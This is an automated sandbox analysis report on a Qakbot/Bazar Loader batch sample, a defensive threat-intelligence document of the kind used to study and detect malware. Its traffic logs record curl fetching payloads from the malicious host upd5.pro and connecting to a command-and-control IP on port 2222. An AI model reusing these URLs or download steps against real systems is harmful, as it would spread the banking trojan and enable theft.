Windows Analysis Report
u2.bat

Overview

General Information

Sample name:	u2.bat
Analysis ID:	1427740
MD5:	acaf01f83da439915027c3e2e900c8dd
SHA1:	2861b4e463fa89e05f2d7d629fae5140cef49843
SHA256:	3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d
Tags:	batQakbottchk08
Infos:

Detection

Bazar Loader, Qbot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Check for Windows Defender sandbox

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Yara detected Bazar Loader

Yara detected Qbot

Allocates memory in foreign processes

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Queries memory information (via WMI often done to detect virtual machines)

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Sigma detected: Suspicious Child Process Of Wermgr.EXE

Uses ipconfig to lookup or modify the Windows network settings

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Uses whoami command line tool to query computer and username

Writes to foreign memory regions

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Usage Of Web Request Commands And Cmdlets

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
QakBot, qbotQbot	QBot is a modular information stealer also known as Qakbot or Pinkslipbot. It has been active for years since 2007. It has historically been known as a banking Trojan, meaning that it steals financial data from infected systems, and a loader using C2 servers for payload targeting and download.	GOLD CABIN	http://blog.opensecurityresearch.com/2011/12/intro-to-reversing-w32pinkslipbot.html http://contagiodump.blogspot.com/2010/11/template.html http://www.secureworks.com/research/threat-profiles/gold-lagoon http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf https://0xthreatintel.medium.com/reversing-qakbot-tlp-white-d1b8b37ad8e7	https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot

Signatures

AV Detection

Multi AV Scanner detection for domain / URL

Source: https://upd5.pro/update/02.dll	Virustotal: Detection: 7%			Perma Link
Source: https://upd5.pro/update/qd_x86.exe	Virustotal: Detection: 6%			Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\Desktop\qd_x86.exe	ReversingLabs: Detection: 35%
Source: C:\Users\user\Desktop\qd_x86.exe	Virustotal: Detection: 42%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\Desktop\qd_x86.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00000001800750F0 CryptAcquireContextA,GetLastError,CryptGenRandom,

3_2_00000001800750F0

Source: unknown	HTTPS traffic detected: 45.77.68.166:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.77.68.166:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 138.1.33.162:443 -> 192.168.2.4:49736 version: TLS 1.2

Source:	Binary string: conhost.pdbUGP source: 02.dll.2.dr
Source:	Binary string: Z:\j\projects\qbot4\Release\Win32\qd_x86.pdb source: qd_x86.exe, 00000008.00000000.1799435968.0000000000DC8000.00000002.00000001.01000000.00000006.sdmp, qd_x86.exe, 00000008.00000002.1800368210.0000000000DC8000.00000002.00000001.01000000.00000006.sdmp, qd_x86.exe.5.dr
Source:	Binary string: C:\testing3\data\bdnc\BDNIMBUS-3071711\BDNIMBUS\bin\release\bdnc.pdb source: rundll32.exe, 00000003.00000002.1739313508.0000000180252000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: conhost.pdb source: 02.dll.2.dr

Source: C:\Users\user\Desktop\qd_x86.exe

Code function: 8_2_00D98074 FindFirstFileExW,FindNextFileW,FindClose,FindClose,

8_2_00D98074

Networking

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 5 localhost

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49742 -> 62.204.41.234:2222

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 138.1.33.162 138.1.33.162

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: oracle.comCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234

Source: global traffic	HTTP traffic detected: GET /update/02.dll HTTP/1.1Host: upd5.proUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /update/qd_x86.exe HTTP/1.1Host: upd5.proUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, /User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: oracle.comCache-Control: no-cache

Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: <li class="scl-facebook"><a data-lbl="scl-icon:facebook" href="https://www.facebook.com/Oracle/" equals www.facebook.com (Facebook)
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: <li class="scl-linkedin"><a data-lbl="scl-icon:linkedin" href="https://www.linkedin.com/company/oracle/" equals www.linkedin.com (Linkedin)
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: <li class="scl-youtube"><a data-lbl="scl-icon:you-tube" href="https://www.youtube.com/oracle/" equals www.youtube.com (Youtube)

Source: unknown

DNS traffic detected: queries for: upd5.pro

Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://academy.oracle.com/en/oa-web-overview.html
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://c.go-mpulse.net
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://consent.trustarc.com
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://d.oracleinfinity.io
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://dc.oracleinfinity.io
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://developer.oracle.com/
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://developer.oracle.com/python/what-is-python/
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://go.oracle.com/subscriptions
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://investor.oracle.com/home/default.aspx
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://oracle.112.2o7.net
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://profile.oracle.com/myprofile/account/create-account.jspx
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://s.go-mpulse.net
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://s.go-mpulse.net/boomerang/
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://s2.go-mpulse.net/boomerang/
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://search.oracle.com/events?q=&lang=english
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://search.oracle.com/results
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://search.oracle.com/results?q=u30searchterm&size=10&page=1&tab=all
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://secure.ethicspoint.com/domain/media/en/gui/31053/index.html
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://support.apple.com/downloads/safari
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://tags.tiqcdn.com/
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://tms.oracle.com/
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://tms.oracle.com/main/dev/utag.js
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://tms.oracle.com/main/prod/utag.js
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://tms.oracle.com/main/prod/utag.sync.js
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://twitter.com/oracle
Source: curl.exe, 00000002.00000002.1705793371.0000014861377000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1705403839.00000148613AB000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000002.1705969959.00000148613AB000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1705469913.00000148613AB000.00000004.00000020.00020000.00000000.sdmp, u2.bat	String found in binary or memory: https://upd5.pro/update/02.dll
Source: curl.exe, 00000002.00000002.1705793371.0000014861377000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upd5.pro/update/02.dll)
Source: curl.exe, 00000002.00000002.1705793371.0000014861377000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upd5.pro/update/02.dllLE_S
Source: curl.exe, 00000002.00000002.1705793371.0000014861370000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upd5.pro/update/02.dllWinsta0
Source: curl.exe, 00000002.00000002.1705793371.0000014861377000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upd5.pro/update/02.dllcej
Source: curl.exe, 00000002.00000002.1705793371.0000014861370000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upd5.pro/update/02.dllcurl
Source: curl.exe, 00000002.00000002.1705793371.0000014861377000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upd5.pro/update/02.dllg5m
Source: curl.exe, 00000002.00000002.1705793371.0000014861377000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upd5.pro/update/02.dllws
Source: curl.exe, 00000005.00000002.1757932601.000001B9293F0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000002.1757932601.000001B929406000.00000004.00000020.00020000.00000000.sdmp, u2.bat	String found in binary or memory: https://upd5.pro/update/qd_x86.exe
Source: curl.exe, 00000005.00000002.1757932601.000001B9293F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upd5.pro/update/qd_x86.exe)
Source: curl.exe, 00000005.00000002.1757932601.000001B9293F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upd5.pro/update/qd_x86.exeWinsta0
Source: curl.exe, 00000005.00000003.1757684017.000001B929403000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000002.1757932601.000001B929406000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upd5.pro/update/qd_x86.exeb
Source: curl.exe, 00000005.00000002.1757932601.000001B9293F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upd5.pro/update/qd_x86.execurl
Source: curl.exe, 00000005.00000002.1758052563.000001B92943C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upd5.pro/update/qd_x86.exee
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://www.google.com/chrome/
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://www.linkedin.com/company/oracle/
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://www.mozilla.org/en-US/firefox/new/
Source: wermgr.exe, 00000004.00000003.1797652770.0000022090DE3000.00000004.00000020.00020000.00000000.sdmp, upgrade-browser[1].htm.4.dr	String found in binary or memory: https://www.oracle.com/
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://www.oracle.com/asset/web/favicons/favicon-120.png
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://www.oracle.com/asset/web/favicons/favicon-128.png
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://www.oracle.com/asset/web/favicons/favicon-152.png
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://www.oracle.com/asset/web/favicons/favicon-180.png
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://www.oracle.com/asset/web/favicons/favicon-192.png
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://www.oracle.com/asset/web/favicons/favicon-32.png
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://www.oracle.com/asset/web/fonts/oraclesansvf.woff2
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://www.oracle.com/asset/web/fonts/redwoodicons.woff2
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://www.oracle.com/corporate/accessibility/
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://www.oracle.com/upgrade-browser/
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://www.oracle.com/webapps/redirect/signon?nexturl=
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://www.youtube.com/oracle/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735

Source: unknown	HTTPS traffic detected: 45.77.68.166:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.77.68.166:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 138.1.33.162:443 -> 192.168.2.4:49736 version: TLS 1.2

Contains functionality to call native functions

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_000000018002BAB0 NtAllocateVirtualMemory,NtProtectVirtualMemory,

3_2_000000018002BAB0

Detected potential crypto function

Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001E0A0	3_2_000000018001E0A0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018004D020	3_2_000000018004D020
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800040B0	3_2_00000001800040B0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002F0C0	3_2_000000018002F0C0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180030190	3_2_0000000180030190
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800D61A0	3_2_00000001800D61A0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800201B0	3_2_00000001800201B0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180009200	3_2_0000000180009200
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180083220	3_2_0000000180083220
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800164D0	3_2_00000001800164D0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180004530	3_2_0000000180004530
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180250558	3_2_0000000180250558
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180244524	3_2_0000000180244524
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180032550	3_2_0000000180032550
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180236540	3_2_0000000180236540
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018022D588	3_2_000000018022D588
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180031570	3_2_0000000180031570
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800475D0	3_2_00000001800475D0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800195D0	3_2_00000001800195D0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018023065C	3_2_000000018023065C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002F640	3_2_000000018002F640
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800576A0	3_2_00000001800576A0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180036710	3_2_0000000180036710
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018024C700	3_2_000000018024C700
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180006760	3_2_0000000180006760
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180050770	3_2_0000000180050770
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800307D0	3_2_00000001800307D0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002F800	3_2_000000018002F800
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018000C840	3_2_000000018000C840
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002E920	3_2_000000018002E920
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018022D95C	3_2_000000018022D95C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180031950	3_2_0000000180031950
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180032970	3_2_0000000180032970
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018022E968	3_2_000000018022E968
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001802439F4	3_2_00000001802439F4
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180032B40	3_2_0000000180032B40
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180020B50	3_2_0000000180020B50
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180031BB0	3_2_0000000180031BB0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002FBB0	3_2_000000018002FBB0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180048C20	3_2_0000000180048C20
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001CC70	3_2_000000018001CC70
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180031CB0	3_2_0000000180031CB0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002FD10	3_2_000000018002FD10
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018022DD30	3_2_000000018022DD30
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180046DA0	3_2_0000000180046DA0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001DDC0	3_2_000000018001DDC0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018004FDE0	3_2_000000018004FDE0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180030E40	3_2_0000000180030E40
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002FE50	3_2_000000018002FE50
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180243EA4	3_2_0000000180243EA4
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001898474A534	3_2_000001898474A534
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000189847460C0	3_2_00000189847460C0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001898473C118	3_2_000001898473C118
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001898474833C	3_2_000001898474833C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000018984744398	3_2_0000018984744398
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001898473540C	3_2_000001898473540C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000018984751D50	3_2_0000018984751D50
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001898474CDC0	3_2_000001898474CDC0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001898473CE00	3_2_000001898473CE00
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000018984735EF4	3_2_0000018984735EF4
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001898474F054	3_2_000001898474F054
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000018984750010	3_2_0000018984750010
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000018984753880	3_2_0000018984753880
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000018984744910	3_2_0000018984744910
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000018984739B44	3_2_0000018984739B44
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000018984745B9C	3_2_0000018984745B9C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000018984700040	3_2_0000018984700040
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001898472055D	3_2_000001898472055D
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001898471B5CD	3_2_000001898471B5CD
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001898470B60D	3_2_000001898470B60D
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000018984704701	3_2_0000018984704701
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001898471D861	3_2_000001898471D861
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001898471E81D	3_2_000001898471E81D
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001898472208D	3_2_000001898472208D
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000018984718D41	3_2_0000018984718D41
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000189847148CD	3_2_00000189847148CD
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000018984716B49	3_2_0000018984716B49
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000018984712BA5	3_2_0000018984712BA5
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00DB21A0	8_2_00DB21A0
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D84243	8_2_00D84243
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00DA23EF	8_2_00DA23EF
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00DB44C0	8_2_00DB44C0
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D845A2	8_2_00D845A2
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00DB0800	8_2_00DB0800
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D84910	8_2_00D84910
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D6ABC1	8_2_00D6ABC1
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D84C6F	8_2_00D84C6F
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00DBEC3F	8_2_00DBEC3F
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00DAAD5D	8_2_00DAAD5D
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D84FCD	8_2_00D84FCD
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D69068	8_2_00D69068
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D652FF	8_2_00D652FF
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00DAD200	8_2_00DAD200
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00DA1370	8_2_00DA1370
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D8533A	8_2_00D8533A
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D85698	8_2_00D85698
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00DA18A0	8_2_00DA18A0
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D8386E	8_2_00D8386E
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00DBF9AF	8_2_00DBF9AF
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D85A8C	8_2_00D85A8C
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D83BB0	8_2_00D83BB0
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00DA1CF0	8_2_00DA1CF0
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00DADC08	8_2_00DADC08
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D65EEE	8_2_00D65EEE
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D9FE89	8_2_00D9FE89
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D85E8F	8_2_00D85E8F
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D83F01	8_2_00D83F01

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\qd_x86.exe	Code function: String function: 00D66E70 appears 62 times
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: String function: 00D92DA3 appears 56 times
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: String function: 00D61140 appears 54 times
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: String function: 00D91F12 appears 35 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 0000000180026F00 appears 52 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00000001800D7120 appears 105 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 000000018002B690 appears 297 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 0000000180043930 appears 40 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 0000000180227E80 appears 162 times
